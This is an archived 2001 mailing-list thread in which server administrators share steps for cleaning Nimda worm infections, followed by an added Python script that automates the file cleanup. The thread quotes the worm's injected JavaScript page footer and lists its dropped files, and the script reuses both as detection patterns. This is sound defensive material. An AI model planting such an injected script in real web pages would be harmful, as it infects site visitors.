The virus tries to use backdoors left behind by Code Red. Maybe this was the
way it got in?

/Rasmus


-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Stephen Price
Sent: 19. september 2001 15:33
To: [EMAIL PROTECTED]
Subject: Re: [imail] Nimda Virus


FYI,
Last week I made sure that two of my web servers had all the latest patches.
One is NT 4 and the other is W2K. They both were infected yesterday morning.


----- Original Message -----
From: "Webmaster Oilfield Directory" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, September 19, 2001 2:42 AM
Subject: RE: [imail] Nimda Virus


> This is the new security roll-up package from Microsoft at
> www.microsoft.com/ntserver/sp6asrp.asp for NT 4.0, check it out... it also
> says that any Win2k system, and I quote them, "A new worm is affecting many
> customers. However, systems that are up to date on security patches are at
> little risk from it." Microsoft...
>
> Take it for what it's worth...
>
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Chad Heugel
> Sent: Tuesday, September 18, 2001 8:55 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [imail] Nimda Virus
>
>
> There was another update to NT4 they released, I believe it was July 26 or
> 27th of this year, that included all service releases since SP6a up until
> that date and should have included the original patch that should fix the
> vulnerability. It would essentially be Service Pack 7 IMO, but was not
> released with that designation.
>
> On the servers where that was installed via windowsupdate on the NT4 boxes
> they so far have shown no signs of infection to this point. As have all SP2
> Win2k machines. A few older NT4 boxes though have shown these signs, and even
> after cleaning, not quite sure if they have been 'cleansed' because they are
> still behaving strangely.
>
> I could be wrong, but this is only what I 'believe' to know as true. :)
>
> -Chh2
> ----- Original Message -----
> From: "Charles Frolick" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 10:18 PM
> Subject: RE: [imail] Nimda Virus
>
>
> > Tell me about it.  I still have two NT 4.0, SP6a bricks.  About to try
> > reapplying SP6a, hope that works.  Bummer is one of the boxes is my secured
> > site, and I don't have a backup of the key, and key manager says access
> > denied, along with a bunch of other really needed files. If it weren't for
> > cmd.com and its utils I wouldn't be able to do much of anything. Would be
> > nice if I still had all the DOS utils, got too used to doing it GUI (all the
> > floppies are probably past shelf life anyway).
> >
> > Chuck Frolick
> > ArgoNet, Inc.
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > David Rolling
> > Sent: Tuesday, September 18, 2001 8:38 PM
> > To: [EMAIL PROTECTED]
> > Subject: RE: [imail] Nimda Virus
> >
> >
> > Great list, but you forgot about the me*.tmp.exe files. These are the base
> > files for the mep*.tmp.exe files and can be reloaded by iexplorer.exe,
> > mmc.exe and winzip32.exe, MAPI32.DLL, MPR.DLL, system.ini files. This is the
> > worst virus/worm I have ever seen since being online for 5+ years.
> >
> >
> > David Rolling
> > www.infovue.net
> > President
> > 877-722-2162
> > ========================================================
> > On the Plains of Hesitation, Bleach the Bones of Countless
> > Millions Who,
> > at the Dawn of Victory, Sat Down to Wait and Waiting Died
> > =========================================================
> >
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > Scot Desort
> > Sent: Tuesday, September 18, 2001 9:31 PM
> > To: [EMAIL PROTECTED]
> > Subject: Re: [imail] Nimda Virus
> >
> >
> > I have cleaned (I think) one Win2k server. Here are the steps I followed:
> >
> > Here are some suggestions that I've used successfully (so far at least).
> > YMMV.
> >
> > Be sure and check your "Guest" user account.  The worm will enable it and
> > also put it in the local administrators group.
> >
> > To fix the web pages:
> > Open one of them in notepad or something and look at the last line of the
> > file.  You should see:
> > <html><script language="JavaScript">window.open("readme.eml", null,
> > "resizable=no,top=6000,left=6000")</script></html>
> >
> > I used Search & Replace from www.funduc.com to search for this string in all
> > *.htm, *.html, and *.asp files and remove it.
> >
> > Search for readme.eml, .eml, .nws, admin.dll, readme.exe, riched20.dll.
> > Delete them if the modified date on them is today.  Also, mmc.exe.  The good
> > one should be in \winnt\system32 and will be a larger file size.  Note
> > admin.dll is a valid file for FrontPage and will have a smaller file size
> > and different date.
> >
> > Search for MEP*.TMP.EXE in the \temp directory and delete them.
> >
> > Look for root.exe in your web directories and remove it.
> >
> > Remove the drive shares on the root of your drives.
> >
> > Other files to look for are load.exe and a modified system.ini.  I did not
> > see these on NT.
> >
> > I also re-applied SP2 and rebooted.
> >
> > --
> > Scot
> >
> >
> > ----- Original Message -----
> > From: "Charles Frolick" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Tuesday, September 18, 2001 7:25 PM
> > Subject: RE: [imail] Nimda Virus
> >
> >
> > > Has anyone actually been able to completely remove the virus from their
> > > system and return to normal?  I have used several scanners, and manually
> > > did everything I can find documented and still I have two servers that are
> > > essentially paperweights since I cannot connect them to the network, and
> > > they keep losing more and more functionality. (First lost use of
> > > Explorer.exe to serial crashing, now several programs are saying access
> > > denied.)
> > >
> > > Chuck Frolick
> > > ArgoNet, Inc.
> > >
> > > -----Original Message-----
> > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > > Jasmine
> > > Sent: Tuesday, September 18, 2001 3:37 PM
> > > To: [EMAIL PROTECTED]
> > > Subject: [imail] Nimda Virus
> > >
> > >
> > > Has anyone found a separate virus removal tool that does not rely on
> > > anti-virus software yet?
> > >
> > > Thanks.
> > > J.
> > >
> > >
> > >
> > > ______________________________________________________________________
> > > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > > To Manage your Subscription......... http://humankindsystems.com/lists
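
The file-level part of the cleanup Scot Desort describes in the thread (strip the appended window.open("readme.eml") line from *.htm, *.html and *.asp files, then look for freshly written readme.eml, .eml/.nws, admin.dll, readme.exe, riched20.dll, root.exe, load.exe and MEP*.TMP.EXE files), written up as a script. This is an added example, not code from the thread or from any tool mentioned in it. Assumptions: the web root is given as the first argument, a defaced page ends with the footer quoted in the post (the match tolerates whitespace and case differences), and a 24-hour modification-time window stands in for "modified date is today". The Windows-only steps (Guest account membership, root drive shares, comparing mmc.exe sizes) are not covered.

```python
import re
import shutil
import sys
import time
from pathlib import Path

# Footer the post reports Nimda appending to web pages (quoted from the thread).
NIMDA_FOOTER = ('<html><script language="JavaScript">window.open("readme.eml", null, '
                '"resizable=no,top=6000,left=6000")</script></html>')
# Whitespace/case-tolerant match for that footer at the very end of a file.
FOOTER_RE = re.compile(
    r'<html><script language="JavaScript">window\.open\("readme\.eml",\s*null,\s*'
    r'"resizable=no,top=6000,left=6000"\)</script></html>\s*$',
    re.IGNORECASE)

WEB_EXTENSIONS = {".htm", ".html", ".asp"}
# Dropped-file names listed in the thread. Assumption: only recently modified
# copies are flagged, since admin.dll is also a legitimate FrontPage file.
SUSPECT_NAMES = {"readme.eml", "readme.exe", "admin.dll", "riched20.dll",
                 "root.exe", "load.exe"}
SUSPECT_EXTENSIONS = {".eml", ".nws"}


def strip_footer(text):
    """Return (cleaned_text, changed); removes the injected footer if the page ends with it."""
    cleaned, count = FOOTER_RE.subn("", text)
    if count == 0:
        return text, False
    return cleaned.rstrip() + "\n", True


def clean_web_tree(root, dry_run=True):
    """List every web file under root that carries the footer; rewrite them unless dry_run."""
    defaced = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        # latin-1 round-trips any byte sequence, so legacy pages never raise decode errors.
        text = path.read_text(encoding="latin-1")
        cleaned, changed = strip_footer(text)
        if not changed:
            continue
        defaced.append(str(path))
        if not dry_run:
            shutil.copy2(path, str(path) + ".nimda.bak")  # keep the original for forensics
            path.write_text(cleaned, encoding="latin-1")
    return defaced


def is_suspect_name(name):
    """True for the file names the thread associates with the worm."""
    name = name.lower()
    return (name in SUSPECT_NAMES
            or Path(name).suffix in SUSPECT_EXTENSIONS
            or (name.startswith("mep") and name.endswith(".tmp.exe")))


def find_suspect_files(root, max_age_hours=24, now=None):
    """Suspect-named files under root modified within max_age_hours."""
    now = time.time() if now is None else now
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and is_suspect_name(path.name):
            age_hours = (now - path.stat().st_mtime) / 3600.0
            if age_hours <= max_age_hours:
                hits.append(str(path))
    return hits


if __name__ == "__main__":
    # Usage: python nimda_cleanup.py <web-root> [--apply]   (dry run without --apply)
    web_root = sys.argv[1] if len(sys.argv) > 1 else "."
    apply = "--apply" in sys.argv
    for f in clean_web_tree(web_root, dry_run=not apply):
        print(("cleaned " if apply else "defaced ") + f)
    for f in find_suspect_files(web_root):
        print("suspect " + f)
```

Run it once without --apply to get the list of defaced pages and suspect files, and only then with --apply; every rewritten page is copied to a .nimda.bak first, so the original is still available if a hit turns out to be a false positive.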